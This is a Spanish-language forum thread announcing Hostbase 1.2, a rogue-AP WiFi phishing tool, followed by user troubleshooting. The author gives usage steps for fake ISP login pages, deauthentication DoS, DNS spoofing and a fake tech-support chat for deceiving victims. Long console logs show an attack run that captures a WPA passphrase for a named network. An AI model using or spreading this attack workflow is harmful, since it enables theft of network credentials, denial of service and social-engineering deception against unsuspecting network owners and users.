Hostbase 1.2 está aqui

Koala · 30-01-2018 07:40:54

Hostbase reach the limit is here

Nueva version.

CHANGELOG:

Anadido de un modo combo phish
Anadido de un modo combo WEP
Systemo de hotspot para que se hace muy rapida la redireccion en la falsa pagina
Las tarjetas Atheros estan detectado si estan en wlan0,wlan1 o wlan2.
Un tchat para hacer se pasar por el servicio technico

Installacion en la GUIA completa de utilizacion.

Video de explicacion sobre esa nueva version:

Como dicho en la video:

Las falsas paginas tienen que estar en la carpeta /etc entras en la carpeta "paginasAQUI" y copia todo lo que hay en /etc.
(Si tienes las paginas wps de antes borra lo y descarga las nuevas porqué los caminos de fichero han cambiado)

Lo que no digo en la video de explicacion, es que el modo que me gusta mucho es el modo con 1 falso AP encryptado, rapido, silencioso y peligroso cool

Para iniciar el script se copia la carpeta entera de hostbase-1.1 en /tmp, por lo que queda todo esta en el readme.

Las falsas paginas se entran asi: vodafonewps o movistarwps o onowps o jazztelwps o orangewps.

Todo en minusculo y no OnO o onowpS...

Recuerda te, se tiene que empezar por el scan de redes para apagar network-manager y tomar las informaciones.
Tambien reccuerda te que en esa version hay que poner siempre la tarjeta atheros en la GUI como tarjeta wifi del falso AP si usas hostapd , he explicado porqué

airmon-ng

Te dira que tarjeta es atheros para que lo entras en la GUI.

Hostbase es el unico script que hace la diferencia entre Linset y Fluxion y que:

No esta una copia de ninguno otro script
Tiene una DoS activa si cambia el AP de canal
Hace 1 punto de accesso en wpa
Hace hasta 3 fake AP cifrados al mismo tiempo si tienes una tarjeta wifi compatible con hostapd y hostapd bien compilado para hacer eso (modo multi AP)
Usa el protocol wps/pbc para tener la clave wifi
Tiene ahora un systemo de hotspot para hacer una redireccion muy rapida
Usa 2 falsas redes para atacar a 2 redes al mismo tiempo (experimental)

Pide de conocer un poco apache2 y el systemo Debian (kali-linux es un systemo basado en Debian, el mejor para usar hostbase: kali-linux XFCE) y pide conocer bien las rogue AP, por eso he hecho las video de explicaciones en mi cadena youtube.

Hilo completo de documentacion:

Una historia de rogue AP

Video con el modo multi AP, en primero subemos los falsos AP y despuès vemos lo que pasa con dispositivos android, windows10 y otro ordenador con linux.
Asi se ve que la redireccion puede estar muy rapida (No tengo windows10 o sea el ejemplo con windows10 viene de otro miembro que me ha hecho pruebas sobre un script de probada que le enviado.)

Ps: hostbase anda con 2 tarjeta wifi, eso no cambia.Lo que consejo es de iniciar el ordenador sin ninguna tarjeta wifi puesto a dentro y una vez en marcha de poner la tarjeta exterior.
Ps2: para salir del script haces un ctrl+c en el terminal de hostbase, es importante para si quieres acer otra ataque o re iniciar network-manager

Ps2: Para usar el tchat ve te en http://127.0.0.1 a "ayuada en linea" y envias el primero mensaje para que lo ve la victima, ejemplo:
"Servicio technico 7/7 24/24 te vamos a responder en poco tiempo, explical el problemo."

Descargar hostbase: koala633 hostbase rogue AP project

guia completa aqui: GUIA completa de hostbase

Ultima edición por Koala (15-02-2019 16:38:03)

crash · 30-01-2018 08:02:26

biere plus_un

kcdtv · 30-01-2018 11:51:38

¡De lujo! cool
Es impresionante la evolución desde la primera versión.. ¡Qué sigas así maestro! smile
¿La música es de Skazy? Lo digo por las guitaras que le gusta siempre poner algunos riffs en su psytrance.

Koala · 30-01-2018 12:11:38

¿La música es de Skazy? Lo digo por las guitaras que le gusta siempre poner algunos riffs en su psytrance.

"SUN project paranormal" La verdad es que no sé si han tomado eso de skazy o de infected mushroom.

crash · 30-01-2018 13:21:58

lo probare cuando tenga un rato y este un poco más despejado, jejejejejeje estoy hoy un poco zombie.

Koala · 30-01-2018 13:24:57

aie aie aie ahora tenemos un problemo mayor , los zombies llegan en wifi-libre big_smile

crash · 30-01-2018 13:30:27

the walking death on wifi-libre

kiabras · 30-01-2018 15:15:38

donde puedo descargar hostbase-1.2? veo la 1.1 en la descarga. gracias

Koala · 30-01-2018 16:45:04

donde puedo descargar hostbase-1.2? veo la 1.1 en la descarga. gracias

Hola, es escrito 1.1 pero es bien la 1.2 , no he cambiado la carpeta de nombre porqué me hace tambien cambiar caminos de fichero en el codigo.Si sigues el url que he puesto lo tendras.

disquette · 05-02-2018 18:26:40

Hola, voy a reanudar las pruebas smile

Koala · 05-02-2018 18:39:23

Hola, voy a reanudar las pruebas

No lo haces con la version espanol , el filtro para eligir las paginas cambia en la version espanol o sea si intentas de poner sfrwps por ejemplo, no va a andar smile

Toma el url que esta en crack-wifi cool

disquette · 05-02-2018 20:31:19

Oui bien sur !

Koala · 06-02-2018 18:27:25

Ya he modificado un poco el codigo, ahora para todos los modos usado por hostapd se tiene que entrar la tarjeta atheros en la gui.Mas facil asi para los usarios y nos quitta problemo con system.d

Si tienes dudas verifica que tarjeta wifi es la atheros antes de entrar lo en los datos de la gui con:

airmon-ng

Reccuerdo de los pasos a hacer para usar hostbase:

-0 toda la compilacion de hostapd y la instalacion de las dependencias esta indicado en el readme
-1 copiar toda la carpeta hostbase-1.1 en /tmp y la todas las carpetas de las falsas paginas en /etc
-2 empezar por el scan de las redes para apagar el network-manager
-3 eligir la tarjeta atheros en la gui para los modos de hostapd

Descargar
koala633 hostbase rogue AP project

EDIT: hostbase tiene ahora su pagina facebook: Hostbase project

Ultima edición por Koala (11-02-2018 13:48:28)

Patcher · 24-02-2018 18:49:12

He seguido todos los pasos, instalo las dependencias, selecciono la tarjeta Atheros en la GUI y lanzo el modo HostApd; Todo parece correcto y se crea el falso AP.

Me conceto al AP con un tlf con Android. Para conectar al falso AP me pide una contraseña, pero sólo consigo conectar cuando pongo "12345678" con cualquier otra contraseña no conecta, ¿Por que sucede esto?.

Una vez que conecto salta el mensaje que me redirige a la falsa pagina. Aparentemente todo funciona bien a excepción de la contraseña, ¿No se puede hacer que se conecte ponga la contraseña que ponga?.

Edit: Otra cosa, tampoco captura las credenciales al pulsar el boton WPS del AP. Adjunto todo lo que sale en la consola:

root@tormenta:/tmp/hostbase-1.1# ruby hostbase.rb 
wlan1
[*] Wifi card is OK.
Shuting down network manager...
Removed /etc/systemd/system/dbus-org.freedesktop.nm-dispatcher.service.
Removed /etc/systemd/system/multi-user.target.wants/NetworkManager.service.
Starting monitor mode
[*] Iniciando airodump por el scan... Espera 60s hasta que termine y deja la ventana abierta...
Scan terminado, reiniciando tu tarjeta wifi en modo normal
[*] OK
6
[*] Ap channel is OK.
5c:DC:96:9B:34:B4
[*] Ap mac is OK.
wlan1
[*] Wifi card is OK.
orangewps
[*] Phishing page is OK.
1
[*] Channel is OK.
Orange-34B2
Switching atheros card in wlan0
wlan1
Configuration file: /tmp/hostapd.conf
Using interface wlan0 with hwaddr e8:de:27:09:2b:3f and ssid "Orange-34B2 "
WPS: Converting display to virtual_display for WPS 2.0 compliance
WPS: Converting push_button to virtual_push_button for WPS 2.0 compliance
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED 
[*] Configuracion de hostapd...
wlan0: WPS-PBC-ACTIVE 
Internet Systems Consortium DHCP Server 4.3.5
Copyright 2004-2016 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/wlan0/e8:de:27:09:2b:3f/175.0.0.0/24
Sending on   LPF/wlan0/e8:de:27:09:2b:3f/175.0.0.0/24

No subnet declaration for /etc/dhcpd.conf (no IPv4 addresses).
** Ignoring requests on /etc/dhcpd.conf.  If this is not what
   you want, please write a subnet declaration
   in your dhcpd.conf file for the network segment
   to which interface /etc/dhcpd.conf is attached. **

Sending on   Socket/fallback/fallback-net
Server starting service.
dnsspoof: listening on wlan0 [udp dst port 53 and not src 175.0.0.1]
orangewps
wlan0: STA d4:97:0b:ab:03:11 IEEE 802.11: authenticated
wlan0: STA d4:97:0b:ab:03:11 IEEE 802.11: associated (aid 1)
wlan0: AP-STA-CONNECTED d4:97:0b:ab:03:11
wlan0: STA d4:97:0b:ab:03:11 RADIUS: starting accounting session 5CDB6B8456D66821
wlan0: STA d4:97:0b:ab:03:11 WPA: pairwise key handshake completed (RSN)
reuse_lease: lease age 4672 (secs) under 25% threshold, reply with unaltered, existing lease for 175.0.0.2
DHCPREQUEST for 175.0.0.2 from d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via wlan0
DHCPACK on 175.0.0.2 to d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via wlan0
reuse_lease: lease age 4672 (secs) under 25% threshold, reply with unaltered, existing lease for 175.0.0.2
DHCPREQUEST for 175.0.0.2 from d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via wlan0
DHCPACK on 175.0.0.2 to d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via wlan0
175.0.0.2.45163 > 175.0.0.1.53:  45765+ A? resolver.gslb.mi-idc.com
175.0.0.2.15099 > 175.0.0.1.53:  64045+ A? clients3.google.com
175.0.0.2.60147 > 175.0.0.1.53:  64045+ A? clients3.google.com
175.0.0.2.43188 > 175.0.0.1.53:  39568+ A? www.gstatic.com
175.0.0.2.48866 > 175.0.0.1.53:  39568+ A? www.gstatic.com
175.0.0.2.49921 > 175.0.0.1.53:  2950+ A? mtalk4.google.com
175.0.0.2.56296 > 175.0.0.1.53:  32825+ A? alt8-mtalk.google.com
175.0.0.2.23149 > 175.0.0.1.53:  44812+ A? alt3-mtalk.google.com
175.0.0.2.34635 > 175.0.0.1.53:  21670+ A? hetpro-store.com
[*] Rogue AP creado... preparacion de la DoS activa que sigue el AP...
wlan1
Modo multi AP detected
wlan5
Iniciando la segunda tarjeta wifi...

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  853 wpa_supplicant

PHY     Interface       Driver          Chipset

phy1    wlan0           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n
phy0    wlan5           iwlwifi         Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)

                (mac80211 monitor mode vif enabled for [phy0]wlan5 on [phy0]wlan5mon)
                (mac80211 station mode vif disabled for [phy0]wlan5)

Iniciando la DoS activa que sigue el AP...
Esperamos por la victima...
175.0.0.2.36688 > 175.0.0.1.53:  20551+ A? alt7-mtalk.google.com
175.0.0.2.15906 > 175.0.0.1.53:  20551+ A? alt7-mtalk.google.com
175.0.0.2.55816 > 175.0.0.1.53:  7118+ A? play.googleapis.com
175.0.0.2.21247 > 175.0.0.1.53:  7118+ A? play.googleapis.com
175.0.0.2.15276 > 175.0.0.1.53:  30269+ A? storage.googleapis.com
175.0.0.2.37118 > 175.0.0.1.53:  30269+ A? storage.googleapis.com
175.0.0.2.53619 > 175.0.0.1.53:  1866+ A? clients3.google.com
175.0.0.2.25397 > 175.0.0.1.53:  1866+ A? clients3.google.com
175.0.0.2.22964 > 175.0.0.1.53:  13102+ A? www.gstatic.com
175.0.0.2.62883 > 175.0.0.1.53:  13102+ A? www.gstatic.com
wlan0: WPS-TIMEOUT 
wlan0: WPS-PBC-ACTIVE

Ultima edición por Patcher (24-02-2018 19:21:28)

Koala · 24-02-2018 19:19:46

Patcher escribió:

Me conceto al AP con un tlf con Android. Para conectar al falso AP me pide una contraseña, pero sólo consigo conectar cuando pongo "12345678" con cualquier otra contraseña no conecta, ¿Por que sucede esto?.
Una vez que conecto salta el mensaje que me redirige a la falsa pagina. Aparentemente todo funciona bien a excepción de la contraseña, ¿No se puede hacer que se conecte ponga la contraseña que ponga?.

Hola Patcher smile

Me surprende que lo pruebas, tu problemo es facil, android no puede conectar como un ordenador sobre el WPS, hay que entrar la contrasena o ir a "parametros avanzado" y "toca WPS" (no sé como sa llama en espanol).Asi se conectara con el WPS.

Por eso he dejado el modo de airbase-ng abierto.Puedes hacer te una idea de que quien esta conectado a la red y elegir la buena ataque con este sitio:

MAC vendor

Por ejemplo en la version de hostbase de wifislax he dejado 1 ataque con 3 AP abiertos para que todo se pueden conectar a la red sin problemo pero hay la ataque con 1 punto de accesso en WPA que he dejado.

Patcher · 24-02-2018 19:27:40

Gracias por la respuesta, jejej.. Estoy a tope con Kali por la unica razon de probar tu script. Por cierto, he editado el post miestras me respondias.

El caso es que tengo un problema con el modo airbase-ng, me da algunos errores, por eso estaba utilizando HostApd.

root@tormenta:/tmp/hostbase-1.1# ruby hostbase.rb 
wlan1
[*] Wifi card is OK.
Shuting down network manager...
Removed /etc/systemd/system/dbus-org.freedesktop.nm-dispatcher.service.
Removed /etc/systemd/system/multi-user.target.wants/NetworkManager.service.
Starting monitor mode
[*] Iniciando airodump por el scan... Espera 60s hasta que termine y deja la ventana abierta...
Scan terminado, reiniciando tu tarjeta wifi en modo normal
[*] OK
5
[*] Ap channel is OK.
5c:DC:96:9B:34:B4
[*] Ap mac is OK.
wlan1
[*] Wifi card is OK.
orangewps
[*] Phishing page is OK.
2
[*] Channel is OK.
Orange-34B2
Switching atheros card in wlan0
wlan1
[*] Iniciando airbase-ng como red abierta...

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  853 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)
phy1    wlan5           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

ioctl(SIOCGIFINDEX) failed: No such device
[*] Configuracion de at0...
at0: ERROR while getting interface flags: No existe el dispositivo
SIOCSIFADDR: No existe el dispositivo
at0: ERROR while getting interface flags: No existe el dispositivo
SIOCSIFNETMASK: No existe el dispositivo
SIOCSIFMTU: No existe el dispositivo
SIOCADDRT: La red es inaccesible
Internet Systems Consortium DHCP Server 4.3.5
Copyright 2004-2016 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
at0 missing an interface address
Failed to get interface index: No such device

If you think you have received this message due to a bug rather
than a configuration issue please read the section on submitting
bugs on either our web page at www.isc.org or in the README file
before submitting a bug.  These pages explain the proper
process and the information we find helpful for debugging..

exiting.
dnsspoof: libnet_check_iface() ioctl: No such device

Koala · 24-02-2018 19:36:25

Patcher escribió:

Edit: Otra cosa, tampoco captura las credenciales al pulsar el boton WPS del AP. Adjunto todo lo que sale en la consola:

Con que opcion es eso ? normalmente tiene que para la DoS cuando te conectas y iniciar los wps/probes, de lo que veo en la salida de consola no envia los probes WPS.

Ps: tengo problemo de conexion ahora

Para airbase-ng que tienes como salida de consola con ifconfig -a ?

Patcher · 24-02-2018 19:45:12

koala escribió:

Con que opcion es eso ?

Con HostApd. Creo que mdk3 no está funcionando por que no sale nada en ese lado de la consola, solo sale el cursor.

koala escribió:

Para airbase-ng que tienes como salida de consola con ifconfig -a ?

root@tormenta:/home/patcher# ifconfig -a         
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 3c:97:0e:86:74:4c  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 20  memory 0xf3a00000-f3a20000  

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 7700  bytes 624156 (609.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7700  bytes 624156 (609.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1400
        ether 26:10:59:9b:7b:74  txqueuelen 1000  (Ethernet)
        RX packets 520  bytes 62406 (60.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 425  bytes 215986 (210.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan1: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 6c:88:14:02:75:e1  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wwan0: flags=4098<BROADCAST,MULTICAST>  mtu 1500
        ether 02:15:e0:ec:01:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions

Ultima edición por Patcher (24-02-2018 20:05:38)

Koala · 24-02-2018 20:02:54

Patcher escribió:

Con HostApd. Creo que mdk3 no está funcionando por que no sale nada en ese lado de la consola, solo sale el cursor.

Si me hace igual a mi tambien pero anda smile deja tu telefonico en youtube conectado a la red y veras en séguida que desaparece la conexion.

En la salida de consola no se ve at0 (at0 virtuel es la intefaz que crea airbase) por eso te da errores, si no hay at0 con airbase, no puede andar.

Eso:

wwan0: flags=4098<BROADCAST,MULTICAST>  mtu 1500
        ether 02:15:e0:ec:01:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions

Es un poco raro, ré inicia el systemo y intenta otra vez el ataque con airbase, una vez que todo esta iniciado, antes de conectar te a la red, hace un ifconfig -a para ver si tienes la interfaz de airbase-ng at0.

Patcher · 24-02-2018 20:05:54

Fallo mio Koala, estaba utilizando la wlan1 en lugar de wlan0 que es donde estaba mi atheros despues de reiniciar Kali. Ahora ha funcionado bien con Airbase-ng.

root@tormenta:/tmp/hostbase-1.1# ruby hostbase.rb 
wlan0
[*] Wifi card is OK.
Shuting down network manager...
Removed /etc/systemd/system/dbus-org.freedesktop.nm-dispatcher.service.
Removed /etc/systemd/system/multi-user.target.wants/NetworkManager.service.
Starting monitor mode
[*] Iniciando airodump por el scan... Espera 60s hasta que termine y deja la ventana abierta...
Scan terminado, reiniciando tu tarjeta wifi en modo normal
[*] OK
6
[*] Ap channel is OK.
5C:DC:96:9B:34:B4
[*] Ap mac is OK.
wlan0
[*] Wifi card is OK.
orangewps
[*] Phishing page is OK.
1
[*] Channel is OK.
Orange-34B2
atheros card on wlan0, switching wlan1 to avoid conflict with hostapd and the other card
[*] Iniciando airbase-ng como red abierta...

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 8049 wpa_supplicant

PHY     Interface       Driver          Chipset

phy1    wlan0           ath9k_htc       Atheros Communications, Inc. AR9271 802.11n

                (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
                (mac80211 station mode vif disabled for [phy1]wlan0)
phy0    wlan5           iwlwifi         Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)

[*] Configuracion de at0...
Internet Systems Consortium DHCP Server 4.3.5
Copyright 2004-2016 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/at0/e8:de:27:09:2b:3f/175.0.0.0/24
Sending on   LPF/at0/e8:de:27:09:2b:3f/175.0.0.0/24

No subnet declaration for /etc/dhcpd.conf (no IPv4 addresses).
** Ignoring requests on /etc/dhcpd.conf.  If this is not what
   you want, please write a subnet declaration
   in your dhcpd.conf file for the network segment
   to which interface /etc/dhcpd.conf is attached. **

Sending on   Socket/fallback/fallback-net
Server starting service.
dnsspoof: listening on at0 [udp dst port 53 and not src 175.0.0.1]
orangewps
[*] Rogue AP creado... preparacion de la DoS activa que sigue el AP...
wlan0
Modo multi AP detected
wlan5
Iniciando la segunda tarjeta wifi...

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
 8049 wpa_supplicant

PHY     Interface       Driver          Chipset

phy1    wlan0mon        ath9k_htc       Atheros Communications, Inc. AR9271 802.11n
phy0    wlan5           iwlwifi         Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] (rev 34)

                (mac80211 monitor mode vif enabled for [phy0]wlan5 on [phy0]wlan5mon)
                (mac80211 station mode vif disabled for [phy0]wlan5)

Iniciando la DoS activa que sigue el AP...
Esperamos por la victima...
reuse_lease: lease age 7495 (secs) under 25% threshold, reply with unaltered, existing lease for 175.0.0.2
DHCPREQUEST for 175.0.0.2 from d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via at0
DHCPACK on 175.0.0.2 to d4:97:0b:ab:03:11 (android-f0d345507d0a1a06) via at0
[*] Victima conactado.
175.0.0.2.54699 > 175.0.0.1.53:  62673+ A? resolver.msg.xiaomi.net
175.0.0.2.4852 > 175.0.0.1.53:  4235+ A? resolver.gslb.mi-idc.com
175.0.0.2.44747 > 175.0.0.1.53:  6681+ A? mtalk4.google.com
Iniciando wpa_cli...
175.0.0.2.46474 > 175.0.0.1.53:  8194+ A? alt7-mtalk.google.com
wlan5
5C:DC:96:9B:34:B4
orangewps
175.0.0.2.57219 > 175.0.0.1.53:  5946+ A? clients3.google.com
175.0.0.2.54998 > 175.0.0.1.53:  5946+ A? clients3.google.com
175.0.0.2.18882 > 175.0.0.1.53:  17689+ A? alt1-mtalk.google.com
175.0.0.2.1647 > 175.0.0.1.53:  27490+ A? www.gstatic.com
Configuracion de wpa_cli... esperamos que apoya el boton WPS...
175.0.0.2.26203 > 175.0.0.1.53:  17730+ A? alt3-mtalk.google.com
[*] El boton WPS ha sido activado, WPA-PSK:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
        ssid="Orange-34B2"
        psk="9E6637A4"
        proto=RSN
        key_mgmt=WPA-PSK
        pairwise=CCMP GCMP
        group=CCMP GCMP TKIP
        auth_alg=OPEN
        pbss=2
}

Seguire probando con HostApd a ver si consigo que funcione haciendo lo que comentas. Muchas gracias.

Ultima edición por Patcher (24-02-2018 20:06:37)

Koala · 24-02-2018 20:15:56

Patcher escribió:

Seguire probando con HostApd a ver si consigo que funcione haciendo lo que comentas. Muchas gracias.

De nada smile

El problemo de hostapd es que esta un poco tonto alguna vez... por ejemplo hay que dar un nuevo nombre a las tarjetas wifi antes de inicar hostapd porqué este se toma nuevo nombre solo para iniciar los fake AP.. y si tienes otre tarjeta con el mismo nombre.. aie aie.. tambien si no esta compilado bien el modo multi ap no anda.

hostapd es un muy bueno paquete y se puede personalizar todo pero algunas veces me vuelve loco a mi tambien.

cjrs · 24-02-2018 20:25:32

Koala escribió:

Por ejemplo en la version de hostbase de wifislax

Interesante y muchisimas gracias Koala porque al fin tengamos hostbase en Wifislax64.

Por cierto Koala, si crees que el nuevo mdk4 MDK4 supone alguna mejora con respecto al mdk3, ¿podrías implementarlo en tu hostbase con mdk4 en vez de con mdk3?.

Gracias Koala, y al igual que aumentastes el tiempo de escaneo del airodump-ng de 30 segundos a 60 segundos, ¿podrias incluirle tambien los parametros: "--manufacturer --uptime --wps" y asi vemos el fabricante del router, tiempo que esta el router en funcionamiento y tipo de wps que usa si lo tiene activado?

¿Y algun alma caritativa que haga las falsas paginas para los routers TP-Link? smile

Ultima edición por cjrs (24-02-2018 20:37:15)

kcdtv · 24-02-2018 20:27:50

Patcher escribió:

Estoy a tope con Kali por la unica razon de probar tu script.

smile biere
Y no molesto más pero me ha gustado. big_smile

Koala · 24-02-2018 20:39:38

@Crjs

Hostbase de wifislax ha salido ayer .. y estas pidiendo el mdk4 y que vemos si el wps esta activado o no big_smile deja me el tiempo etc.. etc.. , ya veremos en el futuro mdk3 anda muy bien y con la version de wifislax ya tienes de que ocupar te un poco wink

Kcdtv escribió:

Y no molesto más pero me ha gustado.

A mi lo que me gusta sobre todo es que esta con kali ahora hihi tongue

Patcher · 24-02-2018 22:55:05

kcdtv escribió:

smile biere
Y no molesto más pero me ha gustado. big_smile

koala escribió:

A mi lo que me gusta sobre todo es que esta con kali ahora hihi tongue

Por el momento Kali y yo estamos todavía conociendonos lol

Koala, lo que has hecho para que salte el mensaje emergente en Android y que te invita a ir la falsa página, es todo un acierto en mi opinión, mis felicitaciones !!.

Tema	Respuestas	Vistas	Ultimo mensaje
WPA2: roto con KRACK. ¿Ahora que? por Virkon [ 1 2 ]	26	7673	15-03-2023 16:57:32 por kcdtv
Pegado: Pegado:: AWITAS. Ataque a WPS con rogueAP potegido con WPA por javierbu [ 1 2 ]	34	3754	12-03-2023 18:24:22 por Guybrush92
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 18 ]	436	63508	07-03-2023 12:35:27 por kcdtv
iwd;¿El demonio WiFi Linux qué lo cambiara todo? por kcdtv	0	405	23-02-2023 17:09:39 por kcdtv
Pegado: Pegado:: Base de datos WPSPIN (original) open source actualizada por kcdtv [ 1 2 3 4 5 ]	114	258451	19-02-2023 17:36:14 por chuchof

Foro Wifi-libre.com

Anuncio

#1 30-01-2018 07:40:54